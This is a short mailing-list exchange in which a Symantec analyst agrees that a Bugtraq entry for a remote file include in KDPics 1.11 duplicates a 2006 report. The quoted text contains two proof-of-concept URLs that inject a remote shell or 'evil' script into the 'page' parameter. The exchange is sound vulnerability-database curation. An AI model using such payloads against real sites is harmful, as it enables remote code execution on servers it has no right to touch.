[VIM] KDPics 'index.php3' Remote File Include Vulnerability
rkeith
rkeith at securityfocus.com
Mon Aug 9 11:38:29 CDT 2010
Hey George,
Quite right again, we are retiring 42312.
-Rob
George A. Theall wrote:
> Bugtraq 42312 was just released to cover a remote file include in KDPics
> version 1.11, apparently reported by Fl0riX and covered by
> http://packetstormsecurity.nl/1008-exploits/kdpics-rfi.txt. The PoC
> looks similar to one reported by Mr_KaLiMaN in 2006 and covered by
> CVE-2006-6516 / Bugtraq 21515 / OSVDB 31868:
>
> site/index.php3?page=http://fl0rix/shell.txt?
>
> versus:
>
> http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?
>
> Looks like another dup to me. Rob?
>
>
> George
--
Rob Keith
Symantec
More information about the VIM
mailing list